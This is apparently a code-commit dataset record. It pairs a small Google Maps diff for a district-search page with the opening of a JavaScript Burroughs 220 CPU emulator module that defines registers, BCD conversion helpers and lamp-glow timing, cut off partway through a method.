pin tooltips onto each row. (function(v){ tr.on("mouseover", function() { $("#tooltipIdeology").html(""); if(v["nominate"]!=undefined) { $("#tooltipIdeology").html(v["nominate"]["dim1"]); } else { $("#tooltipIdeology").html("<strong>No Ideology Score</strong>"); } $("#tooltipIdeology").removeClass().addClass("d3-tip"); $("#tooltipIdeology").css("left",($(this).offset().left+245)+"px"); $("#tooltipIdeology").css("top",$(this).offset().top+"px"); $("#tooltipIdeology").css("visibility","visible"); }); tr.on("mouseout",function() { $("#tooltipIdeology").css("visibility","hidden"); }); })(v); tr.appendTo(tbody); lastResult = v; }); tbody.appendTo(table); table.appendTo($("#resultsMembers")); //permLink.appendTo($("#resultsMembers")); $("#resultsMembers").fadeIn(); } }); }
Started on dynamic district search updating through lat/long, but not ready yet. Former-commit-id: f9c625b1d4a6dccfdee381f27c41f1e347e34692
static/js/district.js
Started on dynamic district search updating through lat/long, but not ready yet.
<ide><path>tatic/js/district.js <ide> console.log(lat); <ide> console.log(lng); <ide> var markerPos = {lat: lat, lng: lng}; <del> var map = new google.maps.Map(document.getElementById("google_map"), {zoom: 12, center: markerPos, disableDefaultUI: true, scrollwheel: false, draggable: true, zoomControl: true}); <del> var market = new google.maps.Marker({position: markerPos, map: map}); <add> var map = new google.maps.Map(document.getElementById("google_map"), {zoom: 12, center: markerPos, disableDefaultUI: true, scrollwheel: false, draggable: true, zoomControl: true}); <add> // Put the marker in the lat/long <add> var marker = new google.maps.Marker({position: markerPos, map: map}); <add> // If the user moves the viewport, update the map? <add> google.maps.event.addListener(map, 'idle', function() <add> { <add> console.log("idle now"); <add> var coords = [map.getCenter().lat(), map.getCenter().lng()]; <add> //$("#addressInput").val(coords[0]+", "+coords[1]); <add> //resetResults(); <add> //doLatLong(); <add> }); <ide> <ide> $.ajax({ <ide> dataType: "JSON",
JavaScript
mit
222cde187562d824507edf90200b59f35affb6ca
0
pkimpel/retro-220,pkimpel/retro-220
/*********************************************************************** * retro-220/emulator B220Processor.js ************************************************************************ * Copyright (c) 2017, Paul Kimpel. * Licensed under the MIT License, see * http://www.opensource.org/licenses/mit-license.php ************************************************************************ * Burroughs 220 Emulator Processor (CPU) module. * * Instance variables in all caps generally refer to register or flip-flop (FF) * entities in the processor hardware. See the following documents: * * Burroughs 220 Operational Characterists Manual * (Bulletin 5020A, Burroughs Corporation, revised August 1960). * Handbook of Operating Procedures for the Burroughs 220 * (Bulletin 5023, Burroughs Corporation, November 1959). * Burroughs 220 Schematics * (Technical Manual 4053-1, Burroughs Corporation, December 1958). * Datatron 220 Schematics, Section I [CPU.pdf] * (Technical Manual 4053, Burroughs Corporation, December 1958). * * available at: * http://bitsavers.org/pdf/burroughs/electrodata/220/ * * also: * * An Introduction to Coding the Burroughs 220 * (Bulletin 5019, Burroughs Corporation, December, 1958). * * Burroughs 220 word format: * 44 bits, encoded as binary-coded decimal (BCD); non-decimal codes are * invalid and cause the computer to stop with a Digit Check alarm, also known * as a Forbidden Combination (FC). * * High-order 4 bits are the "sign digit": * Low-order bit of this digit is the actual sign. * Higher-order bits are used in some I/O operations. * Remaining 40 bits are the value as: * 10 decimal digits as a fractional mantissa, with the decimal point * between the sign and high-order (10th) digits * a floating point value with the first two digits as the exponent (biased * by 50) followed by a fractional 8-digit mantissa * 5 two-digit character codes * one instruction word * * Instruction word format: * Low-order 4 digits: operand address * Next-higher 2 digits: operation code * Next-higher 4 digits: control and variant digits used by some instructions * Sign digit: odd value indicates the B register is to be added to the * operand address prior to execution. * * Processor timing is maintained internally in units of milliseconds. * ************************************************************************ * 2017-01-01 P.Kimpel * Original version, cloned from retro-205 emulator/D205Processor.js. 
***********************************************************************/ "use strict"; /**************************************/ function B220Processor(config, devices) { /* Constructor for the 220 Processor module object */ var staticLampGlow = false; // compute fractional lamp glow (experimental) this.mnemonic = "CPU"; B220Processor.instance = this; // externally-available object reference (for DiagMonitor) // Emulator control this.cardatron = null; // reference to Cardatron Control Unit this.config = config; // reference to SystemConfig object this.console = null; // reference to Control Console for I/O this.devices = devices; // hash of I/O device objects this.ioCallback = null; // current I/O interface callback function this.magTape = null; // reference to Magnetic Tape Control Unit this.poweredOn = 0; // system is powered on and initialized this.successor = null; // current delayed-action successor function this.tracing = false; // emulator diagnostic tracing flag // Memory this.memorySize = config.getNode("memorySize"); // memory size, words this.bcdMemorySize = B220Processor.binaryBCD(this.memorySize); this.MM = new Float64Array(this.memorySize); // main memory, 11-digit words this.IB = new B220Processor.Register(11*4, this, true); // memory Input Buffer // Processor throttling control and timing statistics this.asyncTime = 0; // time for processor asynchronous operation during I/O this.execClock = 0; // emulated internal processor clock, ms this.execLimit = 0; // current time slice limit on this.execClock, ms this.instructionCount = 0; // total instructions executed this.opTime = 0; // estimated time for current instruction, ms this.procTimer = 0; // elapsed time that the processor has been running, ms this.procTime = 0; // total emulated running time for processor, ms this.runStamp = 0; // timestamp of start of last time slice, ms this.runTimer = 0; // elapsed run-time timer value, ms this.scheduler = 0; // current setCallback token this.procSlack = 0; // total processor throttling delay, ms this.procSlackAvg = 0; // average slack time per time slice, ms this.procRunAvg = 0; // average elapsed time per time slice, ms this.delayDeltaAvg = 0; // average difference between requested and actual setCallback() delays, ms this.delayLastStamp = 0; // timestamp of last setCallback() delay, ms this.delayRequested = 0; // last requested setCallback() delay, ms // Primary Registers this.A = new B220Processor.Register(11*4, this, staticLampGlow); this.B = new B220Processor.Register( 4*4, this, staticLampGlow); this.C = new B220Processor.Register(10*4, this, staticLampGlow); this.D = new B220Processor.Register(11*4, this, staticLampGlow); this.E = new B220Processor.Register( 4*4, this, staticLampGlow); this.P = new B220Processor.Register( 4*4, this, staticLampGlow); this.R = new B220Processor.Register(11*4, this, staticLampGlow); this.S = new B220Processor.Register( 4*4, this, staticLampGlow); // Register E decrements modulo the system memory size, so override dec(). 
this.E.dec = function decE() { if (this.value == 0) { this.value = this.p.bcdMemorySize; } return this.constructor.prototype.dec.apply(this); }; // Control Console Lamps this.digitCheckAlarm = new B220Processor.FlipFlop(this, staticLampGlow); this.systemNotReady = new B220Processor.FlipFlop(this, staticLampGlow); this.computerNotReady = new B220Processor.FlipFlop(this, staticLampGlow); this.compareLowLamp = new B220Processor.FlipFlop(this, staticLampGlow); this.compareEqualLamp = new B220Processor.FlipFlop(this, staticLampGlow); this.compareHighLamp = new B220Processor.FlipFlop(this, staticLampGlow); // Control Console Switches this.PC1SW = 0; // program control switches 1-10 this.PC2SW = 0; this.PC3SW = 0; this.PC4SW = 0; this.PC5SW = 0; this.PC6SW = 0; this.PC7SW = 0; this.PC8SW = 0; this.PC9SW = 0; this.PC0SW = 0; this.SONSW = 0; // S "On" switch this.SUNITSSW = 0; // S units switch this.STOCSW = 0; // S to C switch this.STOPSW = 0; // S to P switch // Left-Hand Maintenance Panel Switches this.HOLDPZTZEROSW = 0; this.LEADINGZEROESSW = 0; this.PAPERTAPESUMSW = 0; this.ORDERCOMPLEMENTSW = 0; this.MEMORYLOCKOUTSW = 0; this.DCLOCKOUTSW = 0; this.SPDPHOLDSW = 0; this.HOLDSEQUENCE1SW = 0; this.HOLDSEQUENCE2SW = 0; this.HOLDSEQUENCE4SW = 0; this.HOLDSEQUENCE8SW = 0; // Left-Hand Maintenance Panel Registers & Flip-Flops this.CI = new B220Processor.Register(5, this, staticLampGlow); // carry inverters this.DC = new B220Processor.Register(6, this, staticLampGlow); // digit counter (modulo 20) this.SC = new B220Processor.Register(4, this, staticLampGlow); // sequence counter this.SI = new B220Processor.Register(4, this, staticLampGlow); // sum inverters this.X = new B220Processor.Register(4, this, staticLampGlow); // adder X (augend) input this.Y = new B220Processor.Register(4, this, staticLampGlow); // adder Y (addend) input this.Z = new B220Processor.Register(4, this, staticLampGlow); // decimal sum inverters, adder output this.CI.checkFC = B220Processor.emptyFunction; // these registers generate A-F undigits this.SI.checkFC = B220Processor.emptyFunction; this.C10 = new B220Processor.FlipFlop(this, staticLampGlow); // decimal carry toggle this.DST = new B220Processor.FlipFlop(this, staticLampGlow); // D-sign toggle this.LT1 = new B220Processor.FlipFlop(this, staticLampGlow); // logical toggle 1 this.LT2 = new B220Processor.FlipFlop(this, staticLampGlow); // logical toggle 2 this.LT3 = new B220Processor.FlipFlop(this, staticLampGlow); // logical toggle 3 this.SCI = new B220Processor.FlipFlop(this, staticLampGlow); // sequence counter inverter this.SGT = new B220Processor.FlipFlop(this, staticLampGlow); // sign toggle this.SUT = new B220Processor.FlipFlop(this, staticLampGlow); // subtract toggle this.TBT = new B220Processor.FlipFlop(this, staticLampGlow); // tape busy toggle this.TCT = new B220Processor.FlipFlop(this, staticLampGlow); // tape clock toggle this.TPT = new B220Processor.FlipFlop(this, staticLampGlow); // tape pulse toggle this.TWT = new B220Processor.FlipFlop(this, staticLampGlow); // tape write toggle // Right-Hand Maintenance Panel Switches this.MULTIPLEACCESSSW = 0; this.V1V2V3COUNTSW = 0; this.AUDIBLEALARMSW = 0; this.PCOUNTSW = 0; this.DIGITCHECKSW = 0; this.ALARMSW = 0; this.ADCOUNTSW = 0; this.IDLEALARMSW = 0; this.FREQUENCYSELECTSW = 0; this.SINGLEPULSESW = 0; this.FETCHEXECUTELOCKSW = 0; // Right-Hand Maintenance Panel Registers & Flip-Flops this.AX = new B220Processor.Register(10, this, staticLampGlow); // A exponent register this.BI = new B220Processor.Register( 8, this, 
staticLampGlow); // paper tape buffer inverters this.DX = new B220Processor.Register( 8, this, staticLampGlow); // D exponent register this.PA = new B220Processor.Register( 8, this, staticLampGlow); // PA register this.ALT = new B220Processor.FlipFlop(this, staticLampGlow); // program check alarm toggle this.AST = new B220Processor.FlipFlop(this, staticLampGlow); // asynchronous toggle this.CCT = new B220Processor.FlipFlop(this, staticLampGlow); // ?? toggle this.CRT = new B220Processor.FlipFlop(this, staticLampGlow); // Cardatron alarm toggle this.DPT = new B220Processor.FlipFlop(this, staticLampGlow); // decimal point toggle (SPO) this.EWT = new B220Processor.FlipFlop(this, staticLampGlow); // end of word toggle this.EXT = new B220Processor.FlipFlop(this, staticLampGlow); // fetch(0)/execute(1) toggle this.HAT = new B220Processor.FlipFlop(this, staticLampGlow); // high-speed printer alarm toggle this.HCT = new B220Processor.FlipFlop(this, staticLampGlow); // halt control toggle, for SOR, SOH, IOM this.HIT = new B220Processor.FlipFlop(this, staticLampGlow); // high comparison toggle this.MAT = new B220Processor.FlipFlop(this, staticLampGlow); // multiple access toggle this.MET = new B220Processor.FlipFlop(this, staticLampGlow); // memory (storage) alarm toggle this.MNT = new B220Processor.FlipFlop(this, staticLampGlow); // manual toggle this.OFT = new B220Processor.FlipFlop(this, staticLampGlow); // overflow toggle this.PAT = new B220Processor.FlipFlop(this, staticLampGlow); // paper tape alarm toggle this.PRT = new B220Processor.FlipFlop(this, staticLampGlow); // paper tape read toggle this.PZT = new B220Processor.FlipFlop(this, staticLampGlow); // paper tape zone toggle this.RPT = new B220Processor.FlipFlop(this, staticLampGlow); // repeat toggle this.RUT = new B220Processor.FlipFlop(this, staticLampGlow); // run toggle this.SST = new B220Processor.FlipFlop(this, staticLampGlow); // single-step toggle this.TAT = new B220Processor.FlipFlop(this, staticLampGlow); // magnetic tape alarm toggle this.UET = new B220Processor.FlipFlop(this, staticLampGlow); // unequal comparison toggle (HIT=UET=0 => off) // Left/Right Maintenance Panel this.leftPanelOpen = false; this.rightPanelOpen = false; // Context-bound routines this.boundConsoleOutputSign = B220Processor.prototype.consoleOutputSign.bind(this); this.boundConsoleOutputChar = B220Processor.prototype.consoleOutputChar.bind(this); this.boundConsoleOutputFinished = B220Processor.prototype.consoleOutputFinished.bind(this); this.boundConsoleInputReceiveChar = B220Processor.prototype.consoleInputReceiveChar.bind(this); this.boundConsoleInputInitiateNormal = B220Processor.prototype.consoleInputInitiateNormal.bind(this); this.boundConsoleInputInitiateInverse = B220Processor.prototype.consoleInputInitiateInverse.bind(this); this.boundCardatronOutputWord= B220Processor.prototype.cardatronOutputWord.bind(this); this.boundCardatronOutputFinished = B220Processor.prototype.cardatronOutputFinished.bind(this); this.boundCardatronReceiveWord = B220Processor.prototype.cardatronReceiveWord.bind(this); this.boundMagTapeComplete = B220Processor.prototype.magTapeComplete.bind(this); this.boundMagTapeReceiveWord = B220Processor.prototype.magTapeReceiveWord.bind(this); this.boundMagTapeSendWord = B220Processor.prototype.magTapeSendWord.bind(this); this.boundIoComplete = B220Processor.prototype.ioComplete.bind(this); this.clear(); // Create and initialize the processor state this.loadDefaultProgram(); // Preload a default program } 
/*********************************************************************** * Global Constants * ***********************************************************************/ B220Processor.version = "1.03"; B220Processor.tick = 1000/200000; // milliseconds per clock cycle (200KHz) B220Processor.cyclesPerMilli = 1/B220Processor.tick; // clock cycles per millisecond (200 => 200KHz) B220Processor.timeSlice = 13; // maximum processor time slice, ms B220Processor.delayAlpha = 0.000001; // decay factor for exponential weighted average delay B220Processor.delayAlpha1 = 1-B220Processor.delayAlpha; B220Processor.slackAlpha = 0.000001; // decay factor for exponential weighted average slack B220Processor.slackAlpha1 = 1-B220Processor.slackAlpha; B220Processor.neonPersistence = 7; // persistence of neon bulb glow [ms] B220Processor.maxGlowTime = B220Processor.neonPersistence; // panel bulb glow persistence [ms] B220Processor.adderGlowAlpha = B220Processor.neonPersistence/12; // adder and carry toggle glow decay factor, // based on one digit (1/12 word) time [ms] B220Processor.pow2 = [ // powers of 2 from 0 to 52 0x1, 0x2, 0x4, 0x8, 0x10, 0x20, 0x40, 0x80, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000, 0x4000, 0x8000, 0x10000, 0x20000, 0x40000, 0x80000, 0x100000, 0x200000, 0x400000, 0x800000, 0x1000000, 0x2000000, 0x4000000, 0x8000000, 0x10000000, 0x20000000, 0x40000000, 0x80000000, 0x100000000, 0x200000000, 0x400000000, 0x800000000, 0x1000000000, 0x2000000000, 0x4000000000, 0x8000000000, 0x10000000000, 0x20000000000, 0x40000000000, 0x80000000000, 0x100000000000, 0x200000000000, 0x400000000000, 0x800000000000, 0x1000000000000, 0x2000000000000, 0x4000000000000, 0x8000000000000, 0x10000000000000]; B220Processor.mask2 = [ // (2**n)-1 for n from 0 to 52 0x0, 0x1, 0x3, 0x7, 0x0F, 0x1F, 0x3F, 0x7F, 0x0FF, 0x1FF, 0x3FF, 0x7FF, 0x0FFF, 0x1FFF, 0x3FFF, 0x7FFF, 0x0FFFF, 0x1FFFF, 0x3FFFF, 0x7FFFF, 0x0FFFFF, 0x1FFFFF, 0x3FFFFF, 0x7FFFFF, 0x0FFFFFF, 0x1FFFFFF, 0x3FFFFFF, 0x7FFFFFF, 0x0FFFFFFF, 0x1FFFFFFF, 0x3FFFFFFF, 0x7FFFFFFF, 0x0FFFFFFFF, 0x1FFFFFFFF, 0x3FFFFFFFF, 0x7FFFFFFFF, 0x0FFFFFFFFF, 0x1FFFFFFFFF, 0x3FFFFFFFFF, 0x7FFFFFFFFF, 0x0FFFFFFFFFF, 0x1FFFFFFFFFF, 0x3FFFFFFFFFF, 0x7FFFFFFFFFF, 0x0FFFFFFFFFFF, 0x1FFFFFFFFFFF, 0x3FFFFFFFFFFF , 0x7FFFFFFFFFFF, 0x0FFFFFFFFFFFF, 0x1FFFFFFFFFFFF, 0x3FFFFFFFFFFFF, 0x7FFFFFFFFFFFF, 0x0FFFFFFFFFFFFF] ; B220Processor.multiplyDigitCounts = [1, 14, 27, 40, 53, 66, 65, 52, 39, 26]; /*********************************************************************** * Utility Functions * ***********************************************************************/ /**************************************/ B220Processor.emptyFunction = function emptyFunction() { /* A function that does nothing, used for overriding object methods */ return; }; /**************************************/ B220Processor.bcdBinary = function bcdBinary(v) { /* Converts the BCD value "v" to a binary number and returns it. 
If a BCD digit is not decimal, coerces it to an 8 or 9 instead */ var d; var power = 1; var result = 0; while(v) { d = v % 0x10; v = (v-d)/0x10; if (d > 9) { d &= 0x09; // turn off the middle 2 bits } result += d*power; power *= 10; } return result; }; /**************************************/ B220Processor.binaryBCD = function binaryBCD(v) { /* Converts the binary value "v" to a BCD number and returns it */ var d; var power = 1; var result = 0; while(v) { d = v % 10; result += d*power; power *= 0x10; v = (v-d)/10; } return result; }; /**************************************/ B220Processor.padLeft = function padLeft(v, digits, pad) { /* Converts "v" to a string if necessary and formats to a total length of "digits," padding with the "pad" character on the left. Used only for debug */ var padChar = (pad || "0").toString(); var s = v.toString(); var len = s.length; if (len > digits) { s = s.substring(len-digits); } else { while (len < digits) { s = padChar + s; ++len; } } return s; }; /**************************************/ B220Processor.formatWord = function formatWord(w) { /* Formats the BCD value of 220 word "w" as the customary "9 9999 99 9999" */ var s = B220Processor.padLeft(w.toString(16), 11); return s.substring(0, 1) + " " + s.substring(1, 5) + " " + s.substring(5, 7) + " " + s.substring(7); }; /*********************************************************************** * Bit and Field Manipulation Functions * ***********************************************************************/ /**************************************/ B220Processor.bitTest = function bitTest(word, bit) { /* Extracts and returns the specified bit from the word */ var p; // bottom portion of word power of 2 if (bit > 0) { return ((word - word % (p = B220Processor.pow2[bit]))/p) % 2; } else { return word % 2; } }; /**************************************/ B220Processor.bitSet = function bitSet(word, bit) { /* Sets the specified bit in word and returns the updated word */ var ue = bit+1; // word upper power exponent var bpower = // bottom portion of word power of 2 B220Processor.pow2[bit]; var bottom = // unaffected bottom portion of word (bit <= 0 ? 0 : (word % bpower)); var top = // unaffected top portion of word word - (word % B220Processor.pow2[ue]); return bpower + top + bottom; }; /**************************************/ B220Processor.bitReset = function bitReset(word, bit) { /* Resets the specified bit in word and returns the updated word */ var ue = bit+1; // word upper power exponent var bottom = // unaffected bottom portion of word (bit <= 0 ? 0 : (word % B220Processor.pow2[bit])); var top = // unaffected top portion of word word - (word % B220Processor.pow2[ue]); return top + bottom; }; /**************************************/ B220Processor.bitFlip = function bitFlip(word, bit) { /* Complements the specified bit in word and returns the updated word */ var ue = bit+1; // word upper power exponent var bpower = // bottom portion of word power of 2 B220Processor.pow2[bit]; var bottom = // unaffected bottom portion of word (bit <= 0 ? 
0 : (word % bpower)); var middle = // bottom portion of word starting with affected bit word % B220Processor.pow2[ue]; var top = word - middle; // unaffected top portion of word if (middle >= bpower) { // if the affected bit is a one return top + bottom; // return the result with it set to zero } else { // otherwise return bpower + top + bottom; // return the result with it set to one } }; /**************************************/ B220Processor.fieldIsolate = function fieldIsolate(word, start, width) { /* Extracts a bit field [start:width] from word and returns the field */ var le = start-width+1; // lower power exponent var p; // bottom portion of word power of 2 return (le <= 0 ? word : (word - word % (p = B220Processor.pow2[le]))/p ) % B220Processor.pow2[width]; }; /**************************************/ B220Processor.fieldInsert = function fieldInsert(word, start, width, value) { /* Inserts a bit field from the low-order bits of value ([48-width:width]) into word.[start:width] and returns the updated word */ var ue = start+1; // word upper power exponent var le = ue-width; // word lower power exponent var bpower = // bottom portion of word power of 2 B220Processor.pow2[le]; var bottom = // unaffected bottom portion of word (le <= 0 ? 0 : (word % bpower)); var top = // unaffected top portion of word (ue <= 0 ? 0 : (word - (word % B220Processor.pow2[ue]))); return (value % B220Processor.pow2[width])*bpower + top + bottom; }; /**************************************/ B220Processor.fieldTransfer = function fieldTransfer(word, wstart, width, value, vstart) { /* Inserts a bit field from value.[vstart:width] into word.[wstart:width] and returns the updated word */ var ue = wstart+1; // word upper power exponent var le = ue-width; // word lower power exponent var ve = vstart-width+1; // value lower power exponent var vpower; // bottom port of value power of 2 var bpower = // bottom portion of word power of 2 B220Processor.pow2[le]; var bottom = // unaffected bottom portion of word (le <= 0 ? 0 : (word % bpower)); var top = // unaffected top portion of word (ue <= 0 ? 0 : (word - (word % B220Processor.pow2[ue]))); return ((ve <= 0 ? 
value : (value - value % (vpower = B220Processor.pow2[ve]))/vpower ) % B220Processor.pow2[width] )*bpower + top + bottom; }; /*********************************************************************** * System Clear & Lamp Glow Management * ***********************************************************************/ /**************************************/ B220Processor.prototype.clear = function clear() { /* Initializes (and if necessary, creates) the processor state */ // Primary Registers this.A.set(0); this.B.set(0); this.C.set(0); this.D.set(0); this.E.set(0); this.P.set(0); this.R.set(0); this.S.set(0); this.IB.set(0); // Control Console Lamps this.digitCheckAlarm.set(0); this.systemNotReady.set(0); this.computerNotReady.set(0); this.compareLowLamp.set(0); this.compareEqualLamp.set(0); this.compareHighLamp.set(0); // Left-Hand Maintenance Panel Registers & Flip-Flops this.CI.set(0); this.DC.set(0); this.SC.set(0); this.SI.set(0); this.X.set(0); this.Y.set(0); this.Z.set(0); this.C10.set(0); this.DST.set(0); this.LT1.set(0); this.LT2.set(0); this.LT3.set(0); this.SCI.set(0); this.SGT.set(0); this.SUT.set(0); this.TBT.set(0); this.TCT.set(0); this.TPT.set(0); this.TWT.set(0); // Right-Hand Maintenance Panel Registers & Flip-Flops this.AX.set(0); this.BI.set(0); this.DX.set(0); this.PA.set(0); this.ALT.set(0); this.AST.set(0); this.CCT.set(0); this.CRT.set(0); this.DPT.set(0); this.EWT.set(0); this.EXT.set(this.FETCHEXECUTELOCKSW == 2 ? 1 : 0); this.HAT.set(0); this.HCT.set(0); this.HIT.set(0); this.MAT.set(0); this.MET.set(0); this.MNT.set(0); this.OFT.set(0); this.PAT.set(0); this.PRT.set(0); this.PZT.set(0); this.RPT.set(0); this.RUT.set(0); this.SST.set(0); this.TAT.set(0); this.UET.set(0); this.CCONTROL = 0; // copy of C register control digits (4 digits) this.COP = 0; // copy of C register op code (2 digits) this.CADDR = 0; // copy of C register operand address (4 digits) // I/O globals this.rDigit = 0; // variant/format digit from control part of instruction this.vDigit = 0; // variant digit from control part of instruction this.selectedUnit = 0; // currently-selected unit number // Kill any pending action that may be in process if (this.scheduler) { clearCallback(this.scheduler); this.scheduler = 0; } this.updateLampGlow(1); // initialize the lamp states }; /**************************************/ B220Processor.prototype.validateDigitCheck = function validateDigitCheck() { /* Steps through all of the properties of the Processor object, isolating the Register() objects and determining if any of them have a Forbidden Combination condition. If not, turns off the Digit Check alarm */ var alarm = false; // true if any register has FC var name = ""; // current property name var reg = null; // current Register object for (name in this) { reg = this[name]; if (reg instanceof B220Processor.Register) { if (reg.hasFC) { alarm = true; break; // out of for loop } } } // for name if (!alarm) { this.digitCheckAlarm.set(0); } }; /**************************************/ B220Processor.prototype.updateLampGlow = function updateLampGlow(beta) { /* Updates the lamp glow for all registers and flip-flops in the system. Beta is a bias in the range (0,1). For normal update use 0; to freeze the current state in the lamps use 1 */ var gamma = (this.RUT.value ? beta || 0 : 1); // First, check whether a Digit Check alarm exists and if the condition has resolved. 
if (this.digitCheckAlarm.value) { this.validateDigitCheck(); } // Primary Registers this.A.updateLampGlow(gamma); this.B.updateLampGlow(gamma); this.C.updateLampGlow(gamma); this.D.updateLampGlow(gamma); this.E.updateLampGlow(gamma); this.P.updateLampGlow(gamma); this.R.updateLampGlow(gamma); this.S.updateLampGlow(gamma); this.IB.updateLampGlow(gamma); // Control Console Lamps this.digitCheckAlarm.updateLampGlow(gamma); this.systemNotReady.updateLampGlow(gamma); this.computerNotReady.updateLampGlow(gamma); this.compareLowLamp.updateLampGlow(gamma); this.compareEqualLamp.updateLampGlow(gamma); this.compareHighLamp.updateLampGlow(gamma); // Left-Hand Maintenance Panel Registers & Flip-Flops if (this.leftPanelOpen) { this.CI.updateLampGlow(gamma); this.DC.updateLampGlow(gamma); this.SC.updateLampGlow(gamma); this.SI.updateLampGlow(gamma); this.X.updateLampGlow(gamma); this.Y.updateLampGlow(gamma); this.Z.updateLampGlow(gamma); this.C10.updateLampGlow(gamma); this.DST.updateLampGlow(gamma); this.LT1.updateLampGlow(gamma); this.LT2.updateLampGlow(gamma); this.LT3.updateLampGlow(gamma); this.SCI.updateLampGlow(gamma); this.SGT.updateLampGlow(gamma); this.SUT.updateLampGlow(gamma); this.TBT.updateLampGlow(gamma); this.TCT.updateLampGlow(gamma); this.TPT.updateLampGlow(gamma); this.TWT.updateLampGlow(gamma); } // Right-Hand Maintenance Panel Registers & Flip-Flops this.ALT.updateLampGlow(gamma); this.MET.updateLampGlow(gamma); this.TAT.updateLampGlow(gamma); this.PAT.updateLampGlow(gamma); this.CRT.updateLampGlow(gamma); this.HAT.updateLampGlow(gamma); this.EXT.updateLampGlow(gamma); this.OFT.updateLampGlow(gamma); this.RPT.updateLampGlow(gamma); this.RUT.updateLampGlow(gamma); if (this.rightPanelOpen) { this.AX.updateLampGlow(gamma); this.BI.updateLampGlow(gamma); this.DX.updateLampGlow(gamma); this.PA.updateLampGlow(gamma); this.AST.updateLampGlow(gamma); this.CCT.updateLampGlow(gamma); this.CRT.updateLampGlow(gamma); this.DPT.updateLampGlow(gamma); this.EWT.updateLampGlow(gamma); this.HCT.updateLampGlow(gamma); this.HIT.updateLampGlow(gamma); this.MAT.updateLampGlow(gamma); this.MNT.updateLampGlow(gamma); this.PRT.updateLampGlow(gamma); this.PZT.updateLampGlow(gamma); this.SST.updateLampGlow(gamma); this.UET.updateLampGlow(gamma); } }; /**************************************/ B220Processor.prototype.asyncOff = function asyncOff() { /* Updates the emulated processor clock while operating asynchronously during I/O so that glow averages can be updated based on elapsed time. 
Also used at the end of and I/O to synchronize the emulated clock with real time */ if (this.asyncTime < 0) { this.asyncTime += performance.now(); this.execClock += this.asyncTime; this.procSlack += this.asyncTime; // consider I/O time to be processor slack } }; /**************************************/ B220Processor.prototype.asyncOn = function asyncOn() { /* Sets this.asyncTime to start asynchronous timing for the processor during I/O */ if (this.asyncTime >= 0) { this.asyncTime = -performance.now(); } }; /**************************************/ B220Processor.prototype.procOff = function procOff() { /* Stops emulated internal run timing for the processor */ while (this.procTime < 0) { this.procTime += this.execClock; } }; /**************************************/ B220Processor.prototype.procOn = function procOn() { /* Starts emulated internal run timing for the processor */ while (this.procTime >= 0) { this.procTime -= this.execClock; } }; /*********************************************************************** * Generic Register Class * ***********************************************************************/ B220Processor.Register = function Register(bits, p, invisible) { /* Constructor for the generic Register class. Defines a binary register of "bits" bits. "p" is a reference to the Processor object, used to access the timing members. "invisible" should be true if the register does not have a visible presence in the UI -- this will inhibit computing average lamp glow values for the register. Note that it is important to increment this.execClock in the caller AFTER setting new values in registers and flip-flops. This allows the average intensity to be computed based on the amount of time a bit was actually in that state */ this.bits = bits; // number of bits in register this.visible = (invisible ? false : true); this.hasFC = false; // true if Forbidden Combination (A-F digit) detected this.lastExecClock = 0; // time register was last set this.p = p; // processor instance this.value = 0; // binary value of register: read-only externally this.glow = new Float64Array(bits); // average lamp glow values }; /**************************************/ B220Processor.Register.prototype.checkFC = function checkFC() { /* Checks the register for a Forbidden Combination (hex A-F) digit. If at least one exists, sets the Digit Check alarm and returns true. The bit mask operations are done 28 bits at a time to avoid problems with the 32-bit 2s-complement arithmetic used by Javascript for bit operations */ var hasFC = false; // true if register has Forbidden Combination var v1 = this.value; // high-order digits (eventually) var v2 = v1%0x10000000; // low-order 7 digits v1 = (v1-v2)/0x10000000; if (((v2 & 0x8888888) >>> 3) & (((v2 & 0x4444444) >>> 2) | ((v2 & 0x2222222) >>> 1))) { hasFC = true; } else if (v1 > 9) { if (((v1 & 0x8888888) >>> 3) & (((v1 & 0x4444444) >>> 2) | ((v1 & 0x2222222) >>> 1))) { hasFC = true; } } this.hasFC = hasFC; if (!hasFC) { return 0; } else { this.p.setDigitCheck(1); return 1; } }; /**************************************/ B220Processor.Register.prototype.updateLampGlow = function updateLampGlow(beta) { /* Updates the lamp glow averages based on this.p.execClock. Note that the glow is always aged by at least one clock tick. Beta is a bias in the range (0,1). 
For normal update, use 0; to freeze the current state, use 1 */ var alpha = Math.min(Math.max(this.p.execClock-this.lastExecClock, B220Processor.tick)/ B220Processor.maxGlowTime + beta, 1.0); var alpha1 = 1.0-alpha; var b = 0; var bit; var v = this.value; if (this.visible) { while (v) { bit = v % 2; v = (v-bit)/2; this.glow[b] = this.glow[b]*alpha1 + bit*alpha; ++b; } while (b < this.bits) { this.glow[b] *= alpha1; ++b; } } this.lastExecClock = this.p.execClock; }; /**************************************/ B220Processor.Register.prototype.set = function set(value) { /* Set a binary value into the register. Use this rather than setting the value member directly so that average lamp glow can be computed. Returns the new value */ this.value = value; if (this.visible) { this.updateLampGlow(0); } if (value > 9) { this.checkFC(); } else { this.hasFC = false; } return value; }; /**************************************/ B220Processor.Register.prototype.getDigit = function getDigit(digitNr) { /* Returns the value of a 4-bit digit in the register. Digits are numbered from 0 starting at the low end (not the way the 220 numbers them) */ return B220Processor.fieldIsolate(this.value, digitNr*4+3, 4); }; /**************************************/ B220Processor.Register.prototype.setDigit = function setDigit(digitNr, value) { /* Sets the value of a 4-bit digit in the register. Digits are numbered from 0 starting at the low end (not the way the 220 numbers them) */ return this.set(B220Processor.fieldInsert(this.value, digitNr*4+3, 4, value)); }; /**************************************/ B220Processor.Register.prototype.getBit = function getBit(bitNr) { /* Returns the value of a bit in the register */ return (bitNr < this.bits ? B220Processor.bitTest(this.value, bitNr) : 0); }; /**************************************/ B220Processor.Register.prototype.setBit = function setBit(bitNr, value) { /* Set a bit on or off in the register. Returns the new register value. Note that the glow is always aged by at least one clock tick */ var alpha = Math.min(Math.max(this.p.execClock-this.lastExecClock, B220Processor.tick)/ B220Processor.maxGlowTime, 1.0); var bit = (value ? 1 : 0); if (bitNr < this.bits) { // Update the lamp glow for the former state. if (this.visible) { this.glow[bitNr] = this.glow[bitNr]*(1.0-alpha) + bit*alpha; } // Set the new state. this.value = (bit ? B220Processor.bitSet(this.value, bitNr) : B220Processor.bitReset(this.value, bitNr)); } this.checkFC(); return this.value; }; /**************************************/ B220Processor.Register.prototype.flipBit = function flipBit(bitNr) { /* Complements a bit in the register. Returns the new register value. Note that the glow is always aged by at least one clock tick */ var alpha = Math.min(Math.max(this.p.execClock-this.lastExecClock, B220Processor.tick)/ B220Processor.maxGlowTime, 1.0); var bit; if (bitNr < this.bits) { bit = 1 - 